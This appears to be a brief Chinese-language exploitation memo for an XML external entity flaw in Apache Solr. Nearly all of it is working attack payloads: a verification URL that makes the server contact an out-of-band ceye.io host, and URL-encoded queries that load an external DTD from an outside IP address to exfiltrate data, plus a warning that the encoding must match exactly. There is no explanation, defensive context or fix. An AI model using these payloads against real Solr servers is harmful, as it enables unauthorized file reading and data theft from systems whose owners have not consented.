apache-solr XXE漏洞
1 验证漏洞
http://192.168.8.109:8983/solr/demo/select?q={!xmlparser%20v=%27%3C!DOCTYPE%20a%20SYSTEM%20%22http://*.ceye.io%22%3E%3Ca%3E%3C/a%3E%27}&wt=xml
2 服务器放一个dtd
浏览器访问:
http://xxx.xxx.xxx.xxx:8983/solr/demo/select?&q=<?xml version="1.0" ?>%ext;%ent;]>&data;&wt=xml&defType=xmlparser
http://192.168.8.109:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3A%2F%2F39.106.45.206%3A8080%2Fcvcv.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
3 注意
编码必须按照上上面这个